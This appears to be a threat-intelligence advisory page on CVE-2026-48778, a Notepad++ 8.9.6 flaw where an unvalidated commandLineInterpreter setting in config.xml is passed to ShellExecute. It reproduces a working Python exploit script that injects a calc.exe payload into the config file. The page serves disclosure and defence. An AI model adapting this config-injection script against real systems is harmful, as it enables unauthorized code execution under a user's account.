Notepad++ 8.9.6 - Arbitrary Code Execution
Notepad++ version 8. 9. 6 and earlier contains a vulnerability where the application reads the <GUIConfig name="commandLineInterpreter"> value from its config. xml file without validation. This value is passed to ShellExecute when the user triggers the "Open Containing Folder in cmd" feature. An attacker with write access to the %APPDATA%\Notepad++\ directory can modify this configuration to inject an arbitrary executable path, resulting in code execution with the current user's privileges. Exploit code in Python demonstrates this by injecting a payload that launches calc. exe instead of the command prompt.
AI Analysis
Technical Summary
CVE-2026-48778 affects Notepad++ versions up to 8.9.6 on Windows 10/11. The vulnerability arises because Notepad++ reads the <GUIConfig name="commandLineInterpreter"> element from config.xml without validating its content. When the user selects "Open Containing Folder in cmd," the application passes this value directly to ShellExecute, allowing execution of arbitrary commands. An attacker who can write to the %APPDATA%\Notepad++\config.xml file can inject a malicious executable path, leading to arbitrary code execution under the current user context. The exploit requires local write access to the user's AppData folder and is demonstrated with a Python script that modifies the config.xml to launch calc.exe.
Potential Impact
Successful exploitation allows an attacker with write access to the Notepad++ configuration directory to execute arbitrary code with the privileges of the current user. This could lead to unauthorized actions on the affected system, including running malicious programs. There are no reports of known exploits in the wild at this time.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until an official fix is available, restrict write permissions to the %APPDATA%\Notepad++\ directory to trusted users only to prevent unauthorized modification of config.xml. Users should monitor the official Notepad++ website and security advisories for updates addressing this vulnerability.
Indicators of Compromise
- exploit-code: # Exploit Title: Notepad++ 8.9.6 - Arbitrary Code Execution # Date: 2026-05-30 # Exploit Author: Kavin Jindal (Avyukt Security) https://www.linkedin.com/in/kavin-jindal/ # Vendor Homepage: https://notepad-plus-plus.org # Software Link: https://notepad-plus-plus.org/downloads/v8.9.6/ # Version: <= 8.9.6 # Tested on: Windows 10/11 # CVE: CVE-2026-48778 # Reference: https://github.com/notepad-plus-plus/notepad-plus-plus/security/advisories/GHSA-7hm3-wp5q-ccv9 # # Description: # Notepad++ reads <GUIConfig name="commandLineInterpreter"> from config.xml without # validation and passes it to ShellExecute when "Open Containing Folder in cmd" is # triggered. An attacker with write access to %APPDATA%\Notepad++\ can inject an # arbitrary executable path, resulting in code execution under the current user context. # In the following script, `calc.exe` has been used to demonstrate this vulnerability. import os, sys appdata = os.environ["APPDATA"] if not appdata: print("[!] APPDATA environment variable not found, exiting..") sys.exit() config_path = os.path.join(appdata, "Notepad++", "config.xml") existing = os.path.exists(config_path) if existing==True: print("[+] Found config.xml at ", config_path) else: print("config.xml not found. Ensure Notepad++ is installed and has been launched atleast once.") x = open(config_path, 'r') s = x.readlines() payload='<GUIConfig name="commandLineInterpreter">calc.exe</GUIConfig>\n' injected=False for num,i in enumerate(s, start=0): if '<GUIConfig name="commandLineInterpreter">' in i: print("[!] Injecting payload..") s[num]=payload injected=True break elif "</GUIConfigs>" in i: print("[!] Injecting payload..") s.insert(num, payload) injected=True break if not injected: print("[!] Payload injection failed.") sys.exit(1) y = open(config_path, 'w') y.writelines(s) print("[+] Payload injected successfully!") print("[+] Testing: Open Notepad++ > File > Open Containing Folder > cmd") print("[+] Calc.exe will launch instead of cmd.") print("end")
Notepad++ 8.9.6 - Arbitrary Code Execution
Description
Notepad++ version 8. 9. 6 and earlier contains a vulnerability where the application reads the <GUIConfig name="commandLineInterpreter"> value from its config. xml file without validation. This value is passed to ShellExecute when the user triggers the "Open Containing Folder in cmd" feature. An attacker with write access to the %APPDATA%\Notepad++\ directory can modify this configuration to inject an arbitrary executable path, resulting in code execution with the current user's privileges. Exploit code in Python demonstrates this by injecting a payload that launches calc. exe instead of the command prompt.
AI-Powered Analysis
Machine-generated threat intelligence
Technical Analysis
CVE-2026-48778 affects Notepad++ versions up to 8.9.6 on Windows 10/11. The vulnerability arises because Notepad++ reads the <GUIConfig name="commandLineInterpreter"> element from config.xml without validating its content. When the user selects "Open Containing Folder in cmd," the application passes this value directly to ShellExecute, allowing execution of arbitrary commands. An attacker who can write to the %APPDATA%\Notepad++\config.xml file can inject a malicious executable path, leading to arbitrary code execution under the current user context. The exploit requires local write access to the user's AppData folder and is demonstrated with a Python script that modifies the config.xml to launch calc.exe.
Potential Impact
Successful exploitation allows an attacker with write access to the Notepad++ configuration directory to execute arbitrary code with the privileges of the current user. This could lead to unauthorized actions on the affected system, including running malicious programs. There are no reports of known exploits in the wild at this time.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until an official fix is available, restrict write permissions to the %APPDATA%\Notepad++\ directory to trusted users only to prevent unauthorized modification of config.xml. Users should monitor the official Notepad++ website and security advisories for updates addressing this vulnerability.
Technical Details
- Cve
- CVE-2026-48778
- Version
- <= 8.9.6
- Vendor
- https://notepad-plus-plus.org
- Application
- https://notepad-plus-plus.org/downloads/v8.9.6
- Author
- Kavin Jindal (Avyukt Security) https://www.linkedin.com/in/kavin-jindal
- Platform
- Windows 10/11
- Edb Id
- 52606
- Has Exploit Code
- true
- Code Language
- python
Indicators of Compromise
Exploit Source Code
Exploit code for Notepad++ 8.9.6 - Arbitrary Code Execution
# Exploit Title: Notepad++ 8.9.6 - Arbitrary Code Execution # Date: 2026-05-30 # Exploit Author: Kavin Jindal (Avyukt Security) https://www.linkedin.com/in/kavin-jindal/ # Vendor Homepage: https://notepad-plus-plus.org # Software Link: https://notepad-plus-plus.org/downloads/v8.9.6/ # Version: <= 8.9.6 # Tested on: Windows 10/11 # CVE: CVE-2026-48778 # Reference: https://github.com/notepad-plus-plus/notepad-plus-plus/security/advisories/GHSA-7hm3-wp5q-ccv9 # # Description: # Notepad++ reads <GU... (1626 more characters)
Threat ID: 6a1b58ece29bf47b508cc6ef
Added to database: 5/30/2026, 9:38:52 PM
Last enriched: 5/30/2026, 9:38:56 PM
Last updated: 5/31/2026, 2:10:40 AM
Views: 14
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Actions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
Need more coverage?
Upgrade to Pro Console for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.